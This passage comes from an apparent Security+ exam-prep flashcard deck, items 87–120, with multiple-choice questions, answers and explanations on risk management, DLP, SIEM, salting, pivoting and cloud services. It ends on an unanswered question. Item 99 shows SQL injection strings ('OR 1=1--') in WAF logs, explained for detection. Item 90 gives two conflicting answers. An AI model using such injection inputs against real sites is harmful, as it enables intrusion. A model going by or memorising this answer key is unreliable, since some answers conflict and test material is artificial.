Firewalls and intrusion prevention systems (IPS): Filtering network traffic to block malicious activity.
Security awareness training: Educating users about security best practices to prevent social engineering attacks.

In contrast:

Deterrent controls aim to discourage attackers from targeting a system or organization. They include measures like visible security cameras, warning signs, or security guards, which may deter potential attackers from attempting an attack.
Corrective controls are implemented after an incident has occurred to mitigate its impact and restore systems to a secure state.
Detective controls are designed to detect and respond to incidents after they have occurred, such as through monitoring, logging, and intrusion detection systems (IDS).
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
87
Q

A systems administrator reports degraded performance on a virtual server. The administrator increases the virtual memory allocation, which improves conditions, but performance degrades again after a few days. The administrator runs an analysis tool and sees the following output:

==3214== timeAttend.exe analyzed
==3214== ERROR SUMMARY:
==3214== malloc/free: in use at exit: 4608 bytes in 18 blocks.
==3214== checked 82116 bytes
==3214== definitely lost: 4608 bytes in 18 blocks.

The administrator terminates the timeAttend.exe, observes system performance over the next few days, and notices that the system performance does not degrade. Which of the following issues is MOST likely occurring?

a. DLL injection
b. API attack
c. Buffer overflow
d. Memory leak

A

d. Memory leak

Here’s why:

Memory leak: A memory leak occurs when a program allocates memory but fails to release it back to the operating system after it is no longer needed. Over time, this can lead to the gradual depletion of available memory resources on the system. In the scenario provided:
    The administrator ran an analysis tool (timeAttend.exe).
    The tool reported memory usage statistics, indicating that memory allocated by the timeAttend.exe process was not properly released (definitely lost: 4608 bytes in 18 blocks).
    After terminating timeAttend.exe, the system performance improved and did not degrade over the next few days, suggesting that terminating the process stopped the continuous memory consumption.

Symptoms consistent with memory leak:
    Initially, the systems administrator increased virtual memory allocation to mitigate degraded performance, which temporarily improved conditions. However, performance degraded again after a few days.
    Memory leaks typically lead to a gradual increase in memory consumption over time, eventually impacting system performance as available memory resources become exhausted.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
88
Q

An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up message reveals that a payment card number was found in the file, and the file upload was blocked. Which of the following controls is most likely causing this issue and should be checked FIRST?

a. DLP
b. Firewall rule
c. Content filter
d. MDM
e. Application allow list

A

a. DLP

Here’s why:

Data Loss Prevention (DLP): DLP solutions are designed to monitor and prevent unauthorized transfer or disclosure of sensitive information, such as payment card numbers, outside of the organization's network. They typically inspect file content, both at rest and in transit, to identify sensitive data patterns based on predefined policies.

Scenario analysis:
    The administrator is trying to upload a support file to a vendor.
    During the upload process, a pop-up message indicates that a payment card number was found in the file.
    The upload is blocked, presumably to prevent the unauthorized transfer of sensitive payment card information to an external party (the vendor).

Controls involved:
    Firewall rule: Firewalls typically control network traffic based on port, protocol, or IP addresses. They are not typically involved in inspecting file content for specific data patterns like payment card numbers.
    Content filter: Content filters can inspect web content for malicious or inappropriate content, but they may not specifically focus on detecting sensitive data patterns like payment card numbers.
    MDM (Mobile Device Management): MDM solutions manage mobile devices and may enforce security policies but are not directly involved in inspecting file content during uploads.
    Application allow list: Application allow lists control which applications can run on a system but do not inspect file content during uploads.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
89
Q

Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational purposes?

a. Acceptance
b. Transference
c. Avoidance
d. Mitigation

A

a. Acceptance

Explanation:

Acceptance in risk management refers to acknowledging the existence of a risk and deciding not to take any further action to mitigate it. This strategy is typically chosen when the cost or effort required to mitigate the risk is deemed to be greater than the impact of the risk itself.

In the context of maintaining a legacy system with known risks for operational purposes, organizations often opt for acceptance. This means they are aware of the risks associated with using the legacy system but continue to use it because:
    It is critical for ongoing operations.
    The organization may lack resources or alternative solutions to upgrade or replace the system.
    The potential impact of the risks (such as downtime or data breaches) is deemed acceptable compared to the cost or disruption that would be caused by attempting to mitigate or avoid the risks.

Transference involves shifting the risk to another party, such as through insurance or outsourcing.

Avoidance aims to eliminate the risk altogether by not engaging in the activity that poses the risk.

Mitigation involves taking actions to reduce the likelihood or impact of a risk.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
90
Q

Which of the following is the BEST action to foster a consistent and auditable incident response process?

a. Incent new hires to constantly update the document with external knowledge.
b. Publish the document in a central repository that is easily accessible to the organization.
c. Restrict eligibility to comment on the process to subject matter experts of each IT silo.
d. Rotate CIRT members to foster a shared responsibility model in the organization.

A

b. Publish the document in a central repository that is easily accessible to the organization.

Explanation:

Incident response processes need to be well-documented and accessible to all relevant stakeholders within the organization. By publishing the incident response document in a central repository that is easily accessible:
    Consistency is promoted because all team members can refer to the same authoritative source for guidance on how to handle incidents.
    Audibility is enhanced because auditors and stakeholders can easily review the documented process to ensure compliance and effectiveness.
    It facilitates collaboration and knowledge sharing among team members, as everyone can contribute to and benefit from a centralized resource.

Incentivizing new hires to update the document with external knowledge (option a) might encourage knowledge sharing but does not ensure the document's centralization or accessibility.

Restricting eligibility to comment on the process to subject matter experts (option c) may limit input and collaboration across teams, potentially hindering the overall effectiveness of the incident response process.

Rotating CIRT members (option d) can foster a shared responsibility model and cross-training but does not directly address the need for a centralized and easily accessible documentation repository.

(Braindump)
d. Rotate CIRT members to foster a shared responsibility model in the organization.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
91
Q

During a recent penetration test, the tester discovers large amounts of data were exfiltrated over the course of 12 months via the internet. The penetration tester stops the test to inform the client of the findings. Which of the following should be the client’s NEXT step to mitigate the issue?

a. Conduct a full vulnerability scan to identify possible vulnerabilities.
b. Perform containment on the critical servers and resources.
c. Review the firewall and identify the source of the active connection.
d. Disconnect the entire infrastructure from the internet.

A

b. Perform containment on the critical servers and resources.

Explanation:

Containment is a crucial initial step in incident response. It involves isolating compromised systems or affected areas to prevent further unauthorized access or data exfiltration. By containing the critical servers and resources, the client can limit the spread of the breach and prevent ongoing data loss.

Reviewing the firewall and identifying the source of the active connection (option c) is also important but typically comes after containment. It helps in understanding how the breach occurred and what steps are needed to prevent future incidents.

Conducting a full vulnerability scan (option a) is necessary to identify vulnerabilities that might have been exploited but should be conducted after containment to prioritize immediate security measures.

Disconnecting the entire infrastructure from the internet (option d) is an extreme measure that may disrupt business operations significantly and should be considered only if containment measures fail or if there is immediate risk of ongoing data exfiltration.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
92
Q

A security analyst is designing the appropriate controls to limit unauthorized access to a physical site. The analyst has a directive to utilize the lowest possible budget. Which of the following would BEST meet the requirements?

a. Preventive controls
b. Compensating controls
c. Deterrent controls
d. Detective controls

A

c. Deterrent controls

Deterrent controls are designed to discourage potential intruders by signaling that security measures are in place. They do not directly prevent access but aim to deter unauthorized individuals from attempting to breach security measures. Examples of deterrent controls include signage indicating the presence of security cameras or alarms, visible locks and barriers, and warning notices.

Here’s why deterrent controls are the best choice given the scenario:

Cost-effectiveness: Deterrent controls are generally more cost-effective to implement compared to preventive controls, which require physical barriers or access controls that might be more expensive.

Suitability for low budgets: Since the directive is to utilize the lowest possible budget, deterrent controls such as signage and visible security measures provide an effective deterrent without significant investment.

Meeting the requirement: Deterrent controls align with the objective of limiting unauthorized access by discouraging potential intruders, thus contributing to the security goal within the specified budget constraints.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
93
Q

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has 100 databases that are on premises. Which of the following solutions will require the LEAST management and support from the company?

a. SaaS
b. IaaS
c. PaaS
d. SDN

A

a. SaaS

Here’s a breakdown of why SaaS is the most suitable option:

SaaS (Software as a Service): With SaaS, the service provider hosts the application and manages everything from the infrastructure to the middleware, application software, and data. Users access the software over the internet, typically through a web browser. In this case, if the company migrates its databases to a SaaS solution, the service provider will handle all aspects of managing and supporting the databases. This includes database maintenance, backups, scaling, security updates, and availability. The company would only need to manage its data and user access, with minimal involvement in the underlying infrastructure.

IaaS (Infrastructure as a Service): With IaaS, the service provider offers virtualized computing resources over the internet, including virtual machines, storage, and networking. The company would be responsible for managing the operating systems, middleware, runtime, and data. While it provides flexibility and control over the infrastructure, it requires more management compared to SaaS as the company still needs to manage the databases themselves.

PaaS (Platform as a Service): PaaS provides a platform allowing customers to develop, run, and manage applications without the complexity of building and maintaining the infrastructure. While it abstracts much of the underlying infrastructure management, it still requires the company to manage the databases and applications deployed on the platform.

SDN (Software-Defined Networking): SDN is a network architecture approach that allows network administrators to manage network services through abstraction of lower-level functionality. It focuses on network management rather than application or database management, making it less relevant for managing databases directly.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
94
Q

Which of the following employee roles is responsible for protecting an organization’s collected personal information?

a. CTO
b. DPO
c. CEO
d. DBA

A

b. DPO (Data Protection Officer).

Here’s a brief explanation of each role:

CTO (Chief Technology Officer): Typically responsible for overseeing the organization's technological needs, which can include infrastructure, security, and development. While the CTO plays a role in implementing technology solutions, they may not specifically focus on protecting personal information unless it falls under their broader responsibilities.

DPO (Data Protection Officer): The DPO is specifically designated to oversee data protection strategy and implementation to ensure compliance with data protection regulations such as GDPR (General Data Protection Regulation). They monitor internal compliance, conduct data protection impact assessments, and act as a point of contact for data subjects and supervisory authorities.

CEO (Chief Executive Officer): The CEO is the highest-ranking executive in a company and is responsible for overall strategy, operations, and the organization's success. While the CEO has ultimate responsibility for everything that happens within the organization, data protection specifics are typically delegated to other roles such as the DPO.

DBA (Database Administrator): Responsible for the design, implementation, maintenance, and security of databases within an organization. While DBAs play a critical role in managing data security within databases, their focus is primarily on technical aspects related to database management rather than overarching data protection responsibilities.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
95
Q

Against the recommendation of the IT security analyst, a company set all user passwords on a server as P@55w0rD. Upon review of the /etc/passwd file, an attacker found the following:

alice:a8df3b6c4fd75f0617431fd248f35191df8d237f bob:2d250c5b2976b03d757f324ebd59340df96aa05e chris:ea981ec3285421d014108089f3f3f997ce0f4150

Which of the following BEST explains why the encrypted passwords do not match?

a. Perfect forward secrecy
b. Key stretching
c. Salting
d. Hashing

A

c. Salting

The reason the encrypted passwords do not match the predictable pattern of P@55w0rD (assuming that was the password set for all users) is due to salting.

Salting is a technique used in password hashing where a random value (salt) is added to each password before hashing. This salt value ensures that even if two users have the same password, their hashed passwords will be different due to the unique salt applied to each password.

In the example provided:

If P@55w0rD was the password set for all users, the system would generate a unique salt for each user.
Each user's password (P@55w0rD in this case) would be combined with their unique salt.
The combination of password and salt is then hashed using a cryptographic hash function (like SHA-256 or similar).
The resulting hashed password stored in /etc/passwd (a8df3b6c4fd75f0617431fd248f35191df8d237f, 2d250c5b2976b03d757f324ebd59340df96aa05e, ea981ec3285421d014108089f3f3f997ce0f4150) is unique due to the salt.

Therefore, the presence of different hashed values for apparently the same password (P@55w0rD) indicates that each password was hashed with a unique salt. This makes it significantly harder for attackers to use precomputed hash tables (rainbow tables) or other methods to reverse engineer the passwords.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
96
Q

After gaining access to a dual-homed (i.e., wired and wireless) multifunction device by exploiting a vulnerability in the device’s firmware, a penetration tester then gains shell access on another networked asset. This technique is an example of:

a. privilege escalation.
b. footprinting.
c. persistence.
d. pivoting.

A

d. pivoting.

The technique described where a penetration tester gains access to another networked asset after initially compromising a dual-homed multifunction device is an example of pivoting.

Pivoting in penetration testing refers to the technique where an attacker uses a compromised system as a stepping stone to attack other systems within the same or different networks to which the initial compromised system has access. This technique helps attackers maintain access to a network even if the original point of entry is discovered and closed off.

In the scenario described:

The penetration tester initially exploits a vulnerability in the multifunction device's firmware.
This allows the penetration tester to gain a foothold on the multifunction device.
The device is dual-homed (connected to both wired and wireless networks), potentially providing access to multiple network segments.
Using the compromised multifunction device as a pivot, the penetration tester gains shell access to another networked asset. This involves leveraging the compromised device's position and connectivity to extend the attack to other parts of the network.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
97
Q

Which of the following should be monitored by threat intelligence researchers who search for leaked credentials?

a. Common Weakness Enumeration
b. OSINT
c. Dark web
d. Vulnerability databases

A

c. Dark web

Threat intelligence researchers who search for leaked credentials typically monitor the dark web. The dark web is a part of the internet that is not indexed by traditional search engines, and it is often used for illicit activities, including the sale and trade of stolen data such as credentials, personal information, and financial details.

Monitoring the dark web allows threat intelligence researchers to identify if any credentials associated with their organization or clients have been compromised and are being traded or sold illegally. This proactive monitoring helps organizations take swift action, such as resetting passwords or implementing additional security measures, to mitigate the risk of unauthorized access and potential data breaches.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
98
Q

A security analyst needs to be able to search and correlate logs from multiple sources in a single tool. Which of the following would BEST allow a security analyst to have this ability?

a. SOAR
b. SIEM
c. Log collectors
d. Network-attached storage

A

b. SIEM (Security Information and Event Management).

SIEM (Security Information and Event Management) is designed to collect, store, analyze, and correlate logs and security events from various sources within an organization’s IT infrastructure. It provides a centralized platform where security analysts can search through logs, detect anomalies, investigate security incidents, and generate reports.

Here’s why SIEM is the best choice for the described scenario:

Centralized Logging: SIEM systems aggregate logs from diverse sources such as network devices, servers, applications, and security tools into a single repository.
Correlation: SIEM tools use correlation rules and algorithms to detect patterns and relationships across different log entries and events, helping analysts identify potential security incidents.
Search Capabilities: SIEM solutions provide powerful search capabilities, allowing analysts to quickly query and filter logs based on various criteria.
Alerting and Reporting: SIEM platforms can generate alerts in real-time based on predefined rules or anomalies detected during log analysis. They also facilitate the creation of comprehensive reports for compliance purposes and incident response.

While log collectors (option c) are important components that feed logs into a SIEM, they do not provide the same level of functionality as a SIEM, which integrates logging, correlation, analysis, and reporting capabilities into a single platform tailored for security operations.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
99
Q

A security analyst is investigating suspicious traffic on the web server located at IP address 10.10.1.1. A search of the WAF logs reveals the following output:

source IP Destination IP Requested URL Action Taken
172.16.1.3 10.10.1.1 /web/cgi-bin/contact? permit and log
category=custname’–
172.16.1.3 10.10.1.1 /web/cgi-bin/contact? permit and log
category=custname+OR+1=1–

Which of the following is MOST likely occurring?

a. XSS attack
b. SQLi attack
c. Replay attack
d. XSRF attack

A

b. SQLi attack

Here’s the reasoning:

SQL Injection (SQLi): SQL injection is a type of attack where an attacker injects malicious SQL queries into input fields of a web application with the intention to manipulate the backend database. The presence of 1=1 in SQL queries is a common technique to bypass authentication or retrieve unintended data from the database.

In the provided logs:

The URLs /web/cgi-bin/contact?category=custname'-- and /web/cgi-bin/contact?category=custname+OR+1=1-- indicate that the attacker is modifying the category parameter in the URL to include SQL injection payloads ('-- and OR 1=1--).

Action Taken: The WAF (Web Application Firewall) logs show that the requests were permitted (permit) and logged. This means that the WAF did not block the requests, possibly because it did not recognize them as malicious due to evasion techniques used by the attacker.

Attack Type: The use of SQL injection payloads ('-- and OR 1=1--) in the URL parameters indicates an attempt to manipulate the SQL queries executed by the web server, typically targeting vulnerabilities in the backend database management system (DBMS).
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
100
Q

Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments though a single firewall?

a. Transit gateway
b. Cloud hot site
c. Edge computing
d. DNS sinkhole

A

a. Transit gateway

Explanation:

A transit gateway is a service that allows organizations to connect multiple Virtual Private Clouds (VPCs) and on-premises networks through a central hub. It acts as a regional gateway and can consolidate and route traffic between VPCs, VPNs, and the internet.
By leveraging a transit gateway, organizations can centralize the management of traffic flows, implement security controls (such as firewalls), and simplify connectivity between different cloud environments and their on-premises networks.
This makes it an ideal choice for consolidating inbound internet traffic and ensuring that it is routed through a single firewall instance, thereby enhancing security and operational efficiency across multiple cloud environments.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
101
Q

A DBA reports that several production server hard drives were wiped over the weekend. The DBA also reports that several Linux servers were unavailable due to system files being deleted unexpectedly. A security analyst verified that software was configured to delete data deliberately from those servers. No backdoors to any servers were found. Which of the following attacks was MOST likely used to cause the data loss?

a. Logic bomb
b. Ransomware
c. Fileless virus
d. Remote access Trojans
e. Rootkit

A

a. Logic bomb

A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. In this case, it appears that the logic bomb was programmed to delete system files and data at a specific time (over the weekend). This explains the deliberate nature of the deletions and the unavailability of the servers without any backdoor being present.

The other options are less likely to be the cause for the following reasons:

Ransomware typically encrypts data and demands a ransom for decryption rather than simply deleting files.
Fileless virus operates in memory and typically does not result in deliberate deletion of files but rather aims to exploit systems without leaving a trace on the disk.
Remote access Trojans (RATs) are used for remote control of a system and typically involve data theft or surveillance rather than destruction of data without any further purpose.
Rootkit hides the presence of other malicious software, such as keyloggers or viruses, but doesn't typically engage in the outright deletion of files as described.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
102
Q

Digital signatures use asymmetric encryption. This means the message is encrypted with:

a. the sender’s private key and decrypted with the sender’s public key.
b. the sender’s public key and decrypted with the sender’s private key.
c. the sender’s private key and decrypted with the recipient’s public key.
e. the sender’s public key and decrypted with the recipient’s private key.

A

a. the sender’s private key and decrypted with the sender’s public key.

Digital signatures indeed use asymmetric encryption, and the process involves the sender’s private and public keys. The correct option regarding the use of keys for creating and verifying a digital signature is:

a. the sender’s private key and decrypted with the sender’s public key.

Here’s how it works:

Creating the Signature:
    The sender creates a hash of the message.
    The sender encrypts this hash using their private key. This encrypted hash is the digital signature.

Verifying the Signature:
    The recipient decrypts the digital signature using the sender's public key to retrieve the hash.
    The recipient also creates a hash of the received message.
    The recipient compares the decrypted hash with the newly created hash. If they match, the message is verified as authentic and untampered.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
103
Q

A security engineer was assigned to implement a solution to prevent attackers from gaining access by pretending to be authorized users. Which of the following technologies meets the requirement?

a. SSO
b. IDS
c. MFA
d. TPM

A

c. MFA (Multi-Factor Authentication)

Explanation:

Multi-Factor Authentication (MFA) adds an additional layer of security beyond just username and password. It requires users to provide two or more verification factors to gain access to a system or application.
MFA typically combines something the user knows (password), with something the user has (like a smartphone app generating a code or a hardware token), or something the user is (biometric data).
This approach significantly reduces the risk of unauthorized access because even if attackers manage to steal or guess a user's password, they would still need the additional factor to authenticate successfully.
Single Sign-On (SSO) simplifies the user login process by allowing users to authenticate once to gain access to multiple systems or applications. While it improves user experience and can indirectly enhance security by reducing password fatigue, it does not inherently prevent attackers from pretending to be authorized users.
Intrusion Detection System (IDS) monitors network or system activities for malicious activities or policy violations. While it detects suspicious behavior, it doesn't directly prevent attackers from impersonating authorized users.
Trusted Platform Module (TPM) is a hardware-based security solution that provides cryptographic functionality to secure hardware and authenticate devices. It does not directly prevent attackers from pretending to be authorized users.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
104
Q

The Chief Information Security Officer (CISO) has requested that a third-party vendor provide supporting documents that show proper controls are in place to protect customer data. Which of the following would be BEST for the third-party vendor to provide to the CISO?

a. GDPR compliance attestation
b. Cloud Security Alliance materials
c. SOC 2 Type 2 report
d. NIST RMF workbooks

A

c. SOC 2 Type 2 report

Explanation:

SOC 2 (Service Organization Control 2) is a widely recognized auditing standard developed by the American Institute of CPAs (AICPA). It focuses on controls relevant to the security, availability, processing integrity, confidentiality, and privacy of data processed by service providers.
A SOC 2 Type 2 report provides detailed information about how a service organization (the third-party vendor in this case) achieves key security objectives based on the Trust Services Criteria (TSC). It includes detailed testing of the effectiveness of controls over a period of time (usually a minimum of six months).
This report is particularly relevant when a vendor needs to demonstrate that they have adequate controls in place to protect customer data, aligning with regulatory requirements and industry best practices.
GDPR compliance attestation is specific to compliance with the European Union's General Data Protection Regulation (GDPR). While important for handling personal data of EU residents, it may not cover all aspects of data protection and security beyond GDPR requirements.
Cloud Security Alliance (CSA) materials are valuable for understanding cloud security best practices and frameworks, but they do not provide specific independent assurance of controls implemented by the vendor.
NIST RMF (Risk Management Framework) workbooks are used for managing and documenting security and privacy controls within federal information systems. However, they are less commonly used in vendor assessments compared to SOC 2 reports.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
105
Q

Which of the following is assured when a user signs an email using a private key?

a. Non-repudiation
b. Confidentiality
c. Availability
d. Authentication

A

a. Non-repudiation

Explanation:

Non-repudiation is assured when a user signs an email using a private key. This means the sender cannot deny having sent the email because the digital signature, created using the sender's private key, uniquely associates the sender with the message. Anyone with the corresponding public key can verify that the message was indeed signed by the holder of the private key.
Confidentiality ensures that the content of the email is accessible only to the intended recipients. However, signing an email does not encrypt its contents; encryption for confidentiality requires using the recipient's public key.
Availability refers to ensuring that the email is accessible to authorized users when needed. Signing an email does not directly impact its availability.
Authentication is the process of verifying the identity of the sender. While signing an email does provide some level of authentication by verifying the sender, the primary assurance provided by signing an email is non-repudiation.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
106
Q

A systems administrator is troubleshooting a server’s connection to an internal web server. The administrator needs to determine the correct ports to use. Which of the following tools BEST shows which ports on the web server are in a listening state?

a. ipconfig
b. ssh
c. ping
d. netstat

A

d. netstat

Explanation:

netstat (network statistics) is a command-line tool that provides various network-related information, including the status of network connections, routing tables, and interface statistics. It is particularly useful for showing which ports are in a listening state on a server, which can help the systems administrator determine the correct ports to use.
ipconfig is a command-line tool used to display and manage the IP configuration of network interfaces on a Windows computer. It does not provide information about listening ports.
ssh (Secure Shell) is a protocol used for secure remote login and other secure network services over an insecure network. It is not used to show listening ports.
ping is a command-line tool used to test the reachability of a host on an IP network. It does not provide information about listening ports.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
107
Q

Which of the following BEST reduces the security risks introduced when running systems that have expired vendor support and lack an immediate replacement?

a. Implement proper network access restrictions.
b. Initiate a bug bounty program.
c. Classify the system as shadow IT.
d. Increase the frequency of vulnerability scans.

A

a. Implement proper network access restrictions.

Explanation:

Implementing proper network access restrictions is the most effective way to reduce security risks for systems with expired vendor support. This approach limits exposure to potential threats by restricting access to the vulnerable system to only those who absolutely need it. It can include measures such as segmentation, firewalls, and access control lists (ACLs).
Initiating a bug bounty program is useful for identifying vulnerabilities, but it is not as immediately effective in reducing risks for unsupported systems as network access restrictions.
Classifying the system as shadow IT might help in acknowledging the risk, but it does not directly mitigate the risk.
Increasing the frequency of vulnerability scans can help in identifying issues more quickly, but without the ability to patch or update the system, the effectiveness of this measure is limited compared to implementing network access restrictions.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
108
Q

Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the following will the company MOST likely reference for guidance during this change?

a. The business continuity plan
b. The retention policy
c. The disaster recovery plan
d. The incident response plan

A

a. The business continuity plan

Explanation:

The business continuity plan (BCP) is designed to ensure that a company can continue to operate during and after a major disruption, such as having to vacate its main office. The BCP includes strategies for maintaining business operations and addressing logistical challenges, such as relocating to alternate, off-site locations.
The disaster recovery plan (DRP) focuses on restoring IT systems and data after a disaster, but it is more specific to IT infrastructure rather than overall business operations.
The retention policy deals with how long records and data are kept and does not address operational relocations.
The incident response plan (IRP) deals with responding to specific incidents, such as security breaches, but does not typically cover broad operational changes like relocating an entire office.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
109
Q

While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse moments later on a different service using the same single sign-on method. Which of the following would BEST detect a malicious actor?

a. Utilizing SIEM correlation engines
b. Deploying Netflow at the network border
c. Disabling session tokens for all sites
d. Deploying a WAF for the web server

A

a. Utilizing SIEM correlation engines

Explanation:

SIEM (Security Information and Event Management) correlation engines are designed to analyze and correlate events from multiple sources across the network, including different applications and services. They can identify patterns and link related incidents, such as the reuse of a token on a different service, indicating potential malicious activity.
Deploying Netflow at the network border would help monitor network traffic patterns but might not effectively correlate the specific use of tokens across different services.
Disabling session tokens for all sites could disrupt user sessions and might not specifically target the detection of malicious activity.
Deploying a WAF (Web Application Firewall) can protect a web server from specific web-based attacks but might not have the capability to correlate token reuse across different services using SSO.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
110
Q

Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective companies. A combined effort from both organizations’ SOC teams would speed up the effort. Which of the following can be written to document this agreement?

a. MOU
b. ISA
c. SLA
d. NDA

A

a. MOU (Memorandum of Understanding)

Explanation:

An MOU (Memorandum of Understanding) is a document that outlines the terms and details of an agreement between parties, including each party's requirements and responsibilities. It is often used to document an agreement to collaborate on projects or initiatives without the formal binding commitments of a contract.
An ISA (Interconnection Security Agreement) is used to define the technical and security requirements for establishing, operating, and maintaining the interconnection of IT systems and networks.
An SLA (Service Level Agreement) is a contract between a service provider and a customer that defines the level of service expected from the service provider.
An NDA (Non-Disclosure Agreement) is a contract that establishes confidentiality between parties to protect sensitive information from being disclosed.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
111
Q

The Chief Information Security Officer wants to prevent exfiltration of sensitive information from employee cell phones when using public USB power charging stations. Which of the following would be the BEST solution to implement?

a. DLP
b. USB data blocker
c. USB OTG
d. Disabling USB ports

A

b. USB data blocker

Explanation:

A USB data blocker is designed to allow power to pass through to a device while blocking any data transfer through the USB port. This would prevent any exfiltration of sensitive information when employees use public USB power charging stations.
DLP (Data Loss Prevention) solutions are typically software-based and are more suited for monitoring and controlling data within the organization's network rather than on individual cell phones in public scenarios.
USB OTG (On-The-Go) is a standard that enables devices to act as a host, allowing other USB devices like keyboards or external storage to be attached, which does not address the issue of blocking data transfer in public charging stations.
Disabling USB ports would prevent the use of public charging stations altogether, which is impractical for employees who need to charge their phones on the go.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
112
Q

The board of directors at a company contracted with an insurance firm to limit the organization’s liability. Which of the following risk management practices does this BEST describe?

a. Transference
b. Avoidance
c. Mitigation
d. Acknowledgement

A

a. Transference

Explanation:

Transference in risk management involves shifting the risk to a third party. By contracting with an insurance firm, the organization is transferring the financial risk associated with potential liabilities to the insurance company, thus limiting its own liability.
Avoidance involves eliminating the risk entirely by not engaging in the activity that presents the risk.
Mitigation involves taking steps to reduce the impact or likelihood of the risk.
Acknowledgement involves recognizing the risk but choosing to accept it without transferring or mitigating it.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
113
Q

Which of the following is a risk that is specifically associated with hosting applications in the public cloud?

a. Unsecured root accounts
b. Zero-day
c. Shared tenancy
d. Insider threat

A

c. Shared tenancy

Explanation:

Shared tenancy is a risk specific to public cloud environments where multiple customers share the same physical hardware and infrastructure. This can lead to potential vulnerabilities where one tenant's security issues could potentially affect others.
Unsecured root accounts and insider threats are risks that can occur in both cloud and on-premises environments.
Zero-day vulnerabilities are a general security risk that can impact any environment, whether cloud-based or not.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
114
Q

DDoS attacks are causing an overload on the cluster of cloud servers. A security architect is researching alternatives to make the cloud environment respond to load fluctuation in a cost-effective way. Which of the following options BEST fulfills the architect’s requirements?

a. An orchestration solution that can adjust scalability of cloud assets
b. Use of multipath by adding more connections to cloud storage
c. Cloud assets replicated on geographically distributed regions
d. An on-site backup that is displayed and only used when the load increases

A

a. An orchestration solution that can adjust scalability of cloud assets

Explanation:

Orchestration solutions are designed to automatically manage, scale, and optimize resources in response to real-time demand. This allows the cloud environment to dynamically adjust its capacity, adding or removing resources as needed to handle load fluctuations efficiently.
Multipath connections to cloud storage can enhance redundancy and performance but may not directly address the need for scalable compute resources to handle DDoS attacks.
Replicating cloud assets across geographically distributed regions can provide redundancy and disaster recovery benefits but may not be as cost-effective for dynamic scalability in response to fluctuating loads.
An on-site backup that is deployed only when load increases can be costly and less efficient compared to automated orchestration solutions that leverage cloud scalability features.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
115
Q

Which of the following documents provides expectations at a technical level for quality, availability, and responsibilities?

a. EOL
b. SLA
c. MOU
d. EOSL

A

b. SLA (Service Level Agreement)

Explanation:

SLA (Service Level Agreement) is a document that outlines the expectations between a service provider and a customer regarding the quality and availability of services. It defines metrics, responsibilities, and guarantees related to service performance, uptime, response times, and other key aspects.
EOL (End of Life) and EOSL (End of Service Life) refer to the lifecycle stages of products or services, indicating when support or maintenance will end, rather than specifying operational expectations.
MOU (Memorandum of Understanding) outlines broader agreements between parties but may not detail technical expectations at the level of a SLA.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
116
Q

Which of the following is an example of transference of risk?

a. Purchasing insurance
b. Patching vulnerable servers
c. Retiring outdated applications
d. Application owner risk sign-off

A

a. Purchasing insurance

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
117
Q

An employee received a word processing file that was delivered as an email attachment. The subject line and email content enticed the employee to open the attachment. Which of the following attack vectors BEST matches this malware?

a. Embedded Python code
b. Macro-enabled file
c. Bash scripting
d. Credential-harvesting website

A

b. Macro-enabled file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
118
Q

A security proposal was set up to track requests for remote access by creating a baseline of the users’ common sign-in properties. When a baseline deviation is detected, an MFA challenge will be triggered. Which of the following should be configured in order to deploy the proposal?

a. Context-aware authentication
b. Simultaneous authentication of equals
c. Extensive authentication protocol
d. Agentless network access control

A

a. Context-aware authentication

Explanation:

Context-aware authentication involves using various contextual factors, such as user location, time of access, device type, and typical behavior patterns, to establish a baseline of normal activity for users.
When there is a deviation from this baseline (such as unusual sign-in properties), it can trigger additional security measures like Multi-Factor Authentication (MFA).
In this scenario, configuring context-aware authentication allows for the detection of baseline deviations and the subsequent triggering of MFA challenges, aligning with the security proposal described.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
119
Q

Which of the following secure coding techniques makes compromised code more difficult for hackers to use?

a. Obfuscation
b. Normalization
c. Execution
d. Reuse

A

a. Obfuscation

Explanation:

Obfuscation is a technique used to make code more difficult to understand or reverse-engineer.
It involves transforming code in a way that preserves its functionality but makes it harder for attackers to analyze.
By obfuscating code, even if it is compromised, it becomes more challenging for hackers to quickly exploit or understand its logic, thereby increasing the complexity and effort required to use the compromised code effectively.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
120
Q

As part of a security compliance assessment, an auditor performs automated vulnerability scans. In addition, which of the following should the auditor do to complete the assessment?

a. User behavior analysis
b. Packet captures
c. Configuration reviews
d. Log analysis
